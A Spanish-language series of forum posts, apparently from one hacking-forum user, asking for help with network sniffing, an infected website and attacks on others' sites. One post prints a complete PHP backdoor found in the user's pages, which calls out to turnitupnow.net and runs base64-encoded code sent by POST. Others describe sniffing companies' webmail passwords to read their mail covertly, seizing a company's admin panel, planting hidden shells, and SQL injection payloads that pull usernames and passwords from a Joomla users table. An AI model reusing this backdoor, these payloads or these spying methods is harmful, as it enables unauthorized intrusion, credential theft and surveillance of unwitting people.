Hola a tod@s!
Por motivos de seguridad hace unos años que utilizo linux, pero estaba pensando, muchas veces he con abel y cain conseguido password dentro de una red lan muy fácilmente en sistemas operativos xp,2000 y vista.
Las de Linux en cambio y MAC nunca se han revelado con abel y cain ya que supongo que utilizan el protocolo SSL y por eso no funciona.
Ahora mi pregunta es, si yo instalo dentro de Linux en Virtual box un windows xp, si alguien ejecuta un sniffer en la red, saldrán los datos de la misma manera que en windows xp? O utilizaría los protocolos de Linux??

Igualmente haré la prueba para estar seguro pero tal vez alguien ya ha hecho la prueba y me gustaría saber que resultado obtuvieron.

Desde ya muchas gracias!

Hola a todos!
Bueno después de años de inactividad en en elhacker.net he tenido que volver y esta vez mira como es el destino pues para hacer una pregunta de seguridad! jeje.

Bueno pues desde que deje el tema de exploit y desfaces, sniffer etc me he dedicado a programar en php, jquery y bueno todas esas cosas.

En una de las webs, la mas grande diria yo, intentando programar desde el trabajo con codeanywhere, me he dado cuenta de que tengo un backdoor

todos mis paginas.php empienzan asi:

      global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Ademas tenida 8 archivos que no tenian nada que ver con mi web y que nada pues ya elimine.
Esto es como los cuernos o es la primera vez que me pasa esto, o es la primera vez que me doy cuenta. jeje

Entonces tengo varias preguntas, a ver si alguien me ayuda..

1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?

2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?

3- hay alguna manera de prevenir?

4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?

Desde ya muchas gracias a quien se tome el tiempo, sea de leer que de responder!

Un saludo!

Hola a todos,
Bueno les cuento que estaba consiguiendo unas cuentas de email, despues del ftp, bueno un poco de todo, hasta que encontre los password del panel de administracion de todos los emails todos los subdominios etc. Entonces, yo me preguntaba, (despues de buscar obviamente), no encontre ninguna manera de hacer una copia a todo lo del panel de administracion, alguien sabe si hay alguna aplicacion, o no se, algo..

Por otro lado, (aunque no lo vaya a hacer), jeje, me entro curiosidad... Ya que yo tengo el mayor rango que podria llegar de conseguir password en una empresa, si yo cambiara password, datos, tarjeta de credito, del panel de control, seria imposible que la empresa lo recupere, no??
Sinceramente, creo que las empresas necesitarian invertir mas dinero en seguridad informatica, jeje.
Un saludo y gracias de nuevo.
Gracias de antemano!

Hola a todos,
Bueno, les cuento mi problema y espero que alguien pueda ayudarme. Una persona esta escribiendo a email de la empresa donde trabajo, a otras empresas y a mi, insultando, difamando etc. Como sabreis es muy molesto eso..

Entonces bueno mire en varias webs, algunas me marcan andalucia, otras madrid y otra alcala de hernandez. Es logico que podria llamar a telefonica, donde ellos me diran que por la ley de proteccion de datos no me daran la informacion, que tengo que presentar denuncia y entonces presentare la denuncia y seguramente nunca encuentren nada.

Ahora mi pregunta es, hay algun programa, para escannear la ip y no se ver que usuarios tiene o ver los puertos abiertos, etc, o algun tracer que me aconsejen utilizar, tengo back track 5, si hay alguna herramienta que pueda utilizar ahi.

Obviamente no pido que me digan como funciona, solo que me aconsejen algun programa. Y yo me busco la vida.. jeje.

Gracias de antemano!
un saluto

Hola a todos, primero que nada me gustaria disculparme si no estoy en la categoria idonea para mi consulta.
Bueno mi problema creo que sea bastante sencillo.
Estoy haciendo unos espionajes muy divertidos, con snifer en redes. Basicamente me sorprendio la inseguridad que tienen todas todas las empresas. Entonces sin contar los que usan IE, que logro tener hasta las cuentas de hotmail, las mas comunes son las cuentas de sus mismos dominios o FTP, entonces, por ejemplo en 2 o 3 minutos consigo las password de todos sus webmails, ahora el problema es el siguiente. Si yo fuera a espiar esos emails, me encuentro con un problema.
Cuando una empresa lee su email con outlook automaticamente borra del servidor. entonces si entro por via web no veo emails, si encambio configuro mi thunderbird, los recibo yo y ellos no.
Entonces, con mi cuenta de hotmail yo puedo ponerla en mi cliente de email, y hotmail no borra nada del servidor, aunque es configurable.
Pero las cuentas de paginaswebs como por ejemplo info@elservidor.com, no deja configurarlas. ¿Porque? he intentado cambiar los puertos, pero me dije dejando sin opciones de poner copia en el servidor y copia local.
Mi consulta entonces es la siguiente, hay alguna manera de poner mi cliente que descargue emails y deje intacto el servidor? He probado a cambiar el puerto. Desde dentro del servidor poner una copia oculta a mi email o un falso es arriesgado y podria durar poco tiempo. A alguien se le ocurre alguna solucion? o algun cliente de email especial?
Gracias! un saludo!

Hola a todos.

Mi consulta es la siguiente, pongamos que una web design haga webs y se haga pagar a trabajo terminado. Podria el web design subir muchas shell escondidas en carpetas y nunca ejecutarlas? Solo ejecutarla en el caso que no le paguen para modificar los archivos etc?

Se que el "cliente" podria hacer un back up de la web. Pero màs que nada la pregunta es por curiosidad. Osea un antivirus o anti backdoor, puede encontrar una shell en el servidor si nunca fue ejecutada?

Thank yous..

Hola a todos.
LLevo ya un par de meses intentando entrar en una pagina web en joomla. Me plantie como reto una pagina bastante importante el hecho es que llevo meses estudiandola y no le he podido sacar nada. Hasta ayer, estaba haciendo unas pruebas y me di cuenta que una parte es vulnerable,

/index.php?option=com_weblinks&view=category&id=2:asdas&limit=10&filter_order_Dir=&filter_order=%00--

filter_order es injectable. entonces me devuelve el siguiente error la web:




Pero si por ejemplo en vez de %00-- pongo DESC;SELECT+'X'--

Me suelta el mismo error, osea, no logro que me suelte el error de: en la tabla tal... etc. Existe algun tipo de proteccion para que el servidor no muestre los errores o algo?

A alguien se le occurre algo?
Thank yous

Hola,
Estaba intentando hacer una prueba con una formulario, el formulario es para enviar un archivo adjunto por email, osea, podria usarse, para cualquier tipo de formulario que necesite enviar un archivo adjunto, como una inscripcion a una escuela, un formulario de confirmacion de pago, etc. La cosa es que se me occurrio que tal vez podria ser vulnerable. Entonces me puse a leer el codigo y me parecio ver una vulnerabilidad ya que por mas que el archivo se envie no se por cuanto tiempo pero el file queda en los temporales del servidor y sin codificar el nombre. Mire un poco la version que es el codigo y si tenia algun nombre y busque en google, encontre informacion sobre que realmente es vulnerable, entonces vi la solucion, pero no pude descubrir como explotarlo, la vulnerabilidad es la siguiente:

http://www.securityfocus.com/bid/24417/info

Aqui les dejo los codigos para que puedan ver la vulnerabilidad,

http://ecmcollege.webuda.com/mailattach.zip

Estaria muy agradecido si alguien pudiera colaborar en algo.
Gracias.

Hola chicos y chicas.
Bueno espero que me puedan ayudar. Estoy intentando obtener el pass cifrado de una pagina web en joomla. Creo que la pagina web no esta muy bien cuidada, dados los pocos conocimientos del dueño. Solo que tiene para buscar bugs es muy dificil ya que tiene solo componente extra que es:

com_hdflvplayer

No se, si tienen idea de como es este componente, les explico, al parecer tienen: 4 parametros que son: id, nombre, linkdelvideo y descripcion.
Ahora bien he provado de muchas maneras, lo maximo que he logrado es eso:

index.php?option=com_hdflvplayer&id=87+UNION+SELECT+concat(username,0x3a,password),87+from+jos_users--

De esta manera, logro que aparezca el numero 87 en la parte de descripcion, si cambio los dos 87, por cualquier otro numero cambia igualmente en la parte de la descripcion. Mi pregunta es la siguiente: ¿Esta parcheado el componente?¿Estoy aplicando bien la injeccion?¿Deberia usar otra injeccion?

espero que puedan ayudarme! thank